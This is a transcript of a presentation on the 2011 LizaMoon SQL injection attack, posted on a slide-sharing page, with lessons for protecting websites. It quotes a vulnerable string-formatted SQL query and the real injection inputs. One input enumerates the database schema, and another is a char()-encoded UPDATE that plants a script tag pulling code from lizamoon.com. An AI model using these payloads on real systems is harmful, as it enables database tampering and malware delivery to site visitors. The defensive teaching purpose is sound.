March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site

Slides:



Advertisements
Similar presentations
Module XIV SQL Injection
Advertisements

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
DEV333. Describe each main attack Demo how the attack works Fix our poor vulnerable application! Why Script Kiddies, Why? Click to Hack.
Understand Database Security Concepts
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
1. What is SQL Injection 2. Different varieties of SQL Injection 3. How to prevent it.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Robofest 2001 Online Management System Jim Needham MCS 4833/01 Senior Project Dr. Chan-Jin Chung, Ph.D.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
Injection Attacks by Example SQL Injection and XSS Adam Forsythe Thomas Hollingsworth.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Presenter Deddie Tjahjono.  Introduction  Website Application Layer  Why Web Application Security  Web Apps Security Scanner  About  Feature  How.
Secure Software Engineering: Input Vulnerabilities
MIS Week 11 Site:
Hamdi Yesilyurt, MA Student in MSDF & PhD-Public Affaris SQL Riji Jacob MS Student in Computer Science.
(CPSC620) Sanjay Tibile Vinay Deore. Agenda  Database and SQL  What is SQL Injection?  Types  Example of attack  Prevention  References.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
TCP/IP Malicious Packet Detection (SQL Injection Detection) Ashok Parchuri.
Preventing SQL Injection Attacks in Stored Procedures Alex Hertz Chris Daiello CAP6135Dr. Cliff Zou University of Central Florida March 19, 2009.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.
Triggers and Stored Procedures in DB 1. Objectives Learn what triggers and stored procedures are Learn the benefits of using them Learn how DB2 implements.
All Input is Evil (Part 1) Introduction Will not cover everything Healthy level of paranoia Use my DVD Swap Shop application (week 2)
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.
Input Validation – common associated risks  ______________ user input controls SQL statements ultimately executed by a database server
SQL INJECTIONS Presented By: Eloy Viteri. What is SQL Injection An SQL injection attack is executed when a web page allows users to enter text into a.
Sumanth M Ganesh B CPSC 620.  SQL Injection attacks allow a malicious individual to execute arbitrary SQL code on your server  The attack could involve.
Web Applications Testing By Jamie Rougvie Supported by.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
DAT356 Hackers Paradise SQL Injection Attacks Doug Seven, Microsoft MVP Cofounder of SqlJunkies.com
Web Application Vulnerabilities ECE 4112 Internetwork Security, Spring 2005 Chris Kelly Chris Lewis April 28, 2005 ECE 4112 Internetwork Security, Spring.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
Database Security Lesson Introduction ●Understand the importance of securing data stored in databases ●Learn how the structured nature of data in databases.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflow Analysis of Buffer Overflow Attacks.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.
Computer Security Keeping you and your computer safe in the digital world.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
M M Waseem Iqbal.  Cause: Unverified/unsanitized user input  Effect: the application runs unintended SQL code.  Attack is particularly effective if.
Cosc 5/4765 Database security. Database Databases have moved from internal use only to externally accessible. –Organizations store vast quantities of.
Security on the Internet Norman White ©2001. Security What is it? Confidentiality – Can my information be stolen? Integrity – Can it be changed? Availability.
SQL Injection By Wenonah Abadilla.
Web Application Vulnerabilities
Chapter 7: Identifying Advanced Attacks
Example – SQL Injection
Unix System Administration
SQL INJECTION ATTACKS.
SQL Injection Attacks Many web servers have backing databases
Computer Security Fundamentals
Teaching Computing to GCSE
Security.
Defense in Depth Web Server Custom HTTP Handler Input Validation
Use proper case (ie Caps for the beginnings of words)
Security.
PHP Forms and Databases.
Protecting Against Common Web Application Vulnerabilities
Unit 32 Every class minute counts! 2 assignments 3 tasks/assignment
Lecture 27 Security I April 4, 2018 Open news web sites.
Presentation transcript:

March 2011 LizaMoon SQL Injection Attack Lessons Learnt From a Close Call And How to Protect Your Site

What was LizaMoon Method – Automated SQL Injection Attack – Targeted old or poorly written, insecure websites – Added strings to database Aim – Redirects user to malware – fake virus scanning website Result – 1.5 million URLs were affected

What is SQL Injection? SQL injection is done by passing in text to your sql statement that you were not expecting. – injection.html injection.html Allows hackers to get access to your database and potentially gain confidential information or just do malicious damage

A real world example Website written 8+ years ago Has a combo box at the top of the page with language selection Language selection can also be passed in a request parameter Ie ExerciseSearch.aspx?Lang=English

Poor Coding Practice Combo box was being populated via sql call – String.Format("Select Lang, Code1 From Tbl_Exercise_Languages Where LangStatus=1 Or Lang='{0}'", LangSelected) This is POOR PRACTICE SQL calls should also be parameterized SQL inputs should always be validated before being run – In my defence this was then only time I did this, all other calls were done properly, as this was added a last minute thing

How they got in The automated program, passes in for the request parameter – English’Select Column_Name, Table_Name From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('nvarchar','nchar','char','text'); Print’ So you then have two sql scripts running – Select Lang, Code1 From Tbl_Exercise_Languages Where LangStatus=1 Or Lang='English’ – Select Column_Name, Table_Name From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('nvarchar','nchar','char','text'); – Print’’; Monitor traffic back, and your have now know every text column and table in the entire database.

How they got in Example of them updating database ?Lang=English1'+update+Tbl_Patients+set+PatientLastName= cast(PatientLastName+as+varchar(8000))+cast(char(60)+char( 47)+char(116)+char(105)+char(116)+char(108)+char(101)+ch ar(62)+char(60)+char(115)+char(99)+char(114)+char(105)+ch ar(112)+char(116)+char(32)+char(115)+char(114)+char(99)+c har(61)+char(104)+char(116)+char(116)+char(112)+char(58)+ char(47)+char(47)+char(108)+char(105)+char(122)+char(97)+ char(109)+char(111)+char(111)+char(110)+char(46)+char(99) +char(111)+char(109)+char(47)+char(117)+char(114)+char(46 )+char(112)+char(104)+char(112)+char(62)+char(60)+char(47 )+char(115)+char(99)+char(114)+char(105)+char(112)+char(1 16)+char(62)+as+varchar(8000))--

Lessons Learnt Don’t write SQL scripts on the fly Always use stored procedures Always use parameters Perform validation on anything from the user Think about limiting what client facing sql account can do Think about some evil bastard may corrupt what you do. Use Microsoft’s protection provided – milyID=f4cd231b-7e06-445b-bec7-343e5884e651

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.